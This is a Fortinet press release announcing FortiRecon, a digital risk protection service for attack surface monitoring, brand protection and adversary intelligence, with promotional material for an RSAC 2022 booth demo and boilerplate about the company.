Fortinet® (NASDAQ: FTNT), a global leader in broad, integrated, and automated cybersecurity solutions, today announced FortiRecon, a complete Digital Risk Protection Service (DRPS) offering that uses a powerful combination of machine learning, automation capabilities, and FortiGuard Labs cybersecurity experts to manage a company’s risk posture and advise meaningful action to protect their brand reputation, enterprise assets, and data. FortiRecon uniquely delivers a triple offering of outside-in coverage across External Attack Surface Management (EASM), Brand Protection (BP), and Adversary-Centric Intelligence (ACI) to counter attacks at the reconnaissance phase – the first stage of a cyberattack – to significantly reduce the risk, time, and cost of later stage threat mitigation.

**Organizations are Overwhelmed in the Fight to Protect their Network, Data, and Reputation and Mitigate Risk Early**

Before attacking an organization, a cybercriminal’s primary objective is to gather as much intelligence about their target as possible. This phase of early reconnaissance arms the adversary with everything they need to determine if and how they would exploit an organization. They will test a company’s defense and response tactics, look for unpatched systems, use social media to learn more about its employees and their normal behavior, and go as far as researching business partners, recent acquisitions, and any other third-party affiliation that could lead to a successful compromise. As organizations digitally accelerate their businesses and deploy hybrid IT architectures that expand the attack surface, identifying and mitigating these threats has become increasingly more difficult. In response to the velocity of threats, cybersecurity best practices have evolved from point-in-time evaluations to continual monitoring, ongoing reviews, and continuous enhancements to an organization’s security posture.

**Taking a Page Out of the Adversary Playbook to Mitigate Risk**

With the introduction of FortiRecon, Fortinet provides enterprise organizations with a powerful tool to understand how the adversary views an organization from the outside to help inform cybersecurity teams, the C-Level, and risk and compliance management on how to prioritize risk and improve the company's overall security posture. FortiRecon offers companies consistent and comprehensive coverage across three areas:

*   **External Attack Surface Monitoring:** Empowers organizations to understand their risk profile and mitigate risks early. Provides an outside-in view of an organization and its subsidiaries to identify exposed known and unknown enterprise assets and associated vulnerabilities, and prioritize the remediation of critical issues. EASM identifies servers, credentials, public cloud service misconfigurations, and even third-party partner software code vulnerabilities that could be exploited by malicious actors.
*   **Brand Protection:** Enables organizations to protect their brand and identify risks to their customers. Proprietary algorithms detect web-based typo-squatting, defacements, and phishing impersonations, as well as rogue mobile apps, credential leaks, and brand impersonation on social media, all common techniques used by cyber threat actors. The early detection of malicious activity allows teams to quickly take action (such as website or application takedown) to stop and prevent damage.
*   **Adversary-Centric Intelligence:** Increases the security awareness of an organization’s SOC team with industry and geography specific coverage to better understand their attackers and protect assets. FortiGuard Labs cybersecurity experts assess the underground and imminent threat risks posed by active cybercriminals to an individual company by proactively monitoring public and private forums, open-source, dark web, and other cybercriminal domains. By engaging in human intelligence collection, FortiGuard Labs experts assess and curate custom threat intelligence, providing recommendations specific to the company, industry, and geography.

For partners, FortiRecon can be sold on top of the Fortinet Security Fabric or as a stand-alone, vendor-agnostic solution that delivers easily digestible reports and enables their customers to quickly understand the risks posed to their company, data, and brand reputation. FortiRecon also extends the categories of risk for which partners can provide insight to customers and increases the opportunity to land new customers that have only invested in more traditional security solutions.

**Enhancing Fortinet’s Early Detection and Response Portfolio and Industry Leading Security Services**

FortiRecon complements Fortinet’s robust portfolio of early detection and advanced response products, including FortiNDR, FortiXDR, FortiDeceptor, in-line sandboxing, as well as advanced automation with FortiAnalyzer, FortiSIEM and FortiSOAR.

Fortinet is firmly committed to the success of SOC teams and the protection of organziations and offers an extensive portfolio of outsource services ranging from cybersecurity assessments and readiness, playbook development, tabletop training, Incident Response, MDR and SOC-as-a-service. This combined offering, alongside the many enhancements across the Fortinet Security Fabric and extended ecosystem deliver simplification and automation to help SOC teams regain focus, control, and speed by strengthening an organization’s SOC with FortiGuard Labs cybersecurity tools and experts.

**Get a demo of FortiRecon in the Fortinet booth at RSAC 2022**

Fortinet will be a Platinum Sponsor at this year’s RSA Conference and will feature product demos, a live theater, and a Fortinet Expert Bar at booth #5855 in the Moscone Center North Hall. Stop by the booth to get a demo of FortiRecon and other recent product, solution, and services innovations from Fortinet. Learn more about Fortinet at RSA and presentations featuring Fortinet executives in the media alert.

**Additional Resources**

*   Read our blog to learn more about the value security services can bring to any organization and find out more about Fortinet’s robust portfolio of AI-powered Security Services.
*   Learn more about Fortinet’s advanced detection offerings for the SOC: FortiNDR, FortiDeceptor, FortiXDR, and FortiGuard In-line Sandbox Service
*   Learn more about Fortinet SOC-as-a-Service.
*   Learn more about how the Fortinet Security Fabric delivers broad, integrated, and automated protection across an organization’s entire digital infrastructure.
*   Learn more about FortiGuard Labs threat intelligence and research or Fortinet’s AI-powered FortiGuard Security Services portfolio.
*   Learn more about Fortinet’s free cybersecurity training which includes broad cyber awareness and product training. As part of the Fortinet Training Advancement Agenda (TAA), the Fortinet Training Institute also provides training and certification through the Network Security Expert (NSE) Certification, Academic Partner, and Education Outreach programs.
*   Read more about how Fortinet customers are securing their organizations.
*   Engage in the Fortinet User Community (Fuse). Share ideas and feedback, learn more about our products and technology, and connect with peers.
*   Follow Fortinet on Twitter, LinkedIn, Facebook, and Instagram. Subscribe to Fortinet on YouTube.

**About Fortinet**

Fortinet (NASDAQ: FTNT) makes possible a digital world that we can always trust through its mission to protect people, devices, and data everywhere. This is why the world’s largest enterprises, service providers, and government organizations choose Fortinet to securely accelerate their digital journey. The Fortinet Security Fabric platform delivers broad, integrated, and automated protections across the entire digital attack surface, securing critical devices, data, applications, and connections from the data center to the cloud to the home office. Ranking #1 in the most security appliances shipped worldwide, more than 580,000 customers trust Fortinet to protect their businesses. And the Fortinet NSE Training Institute, an initiative of Fortinet’s Training Advancement Agenda (TAA), provides one of the largest and broadest training programs in the industry to make cyber training and new career opportunities available to everyone. Learn more at https://www.fortinet.com, the Fortinet Blog, or FortiGuard Labs.

Tag

#mac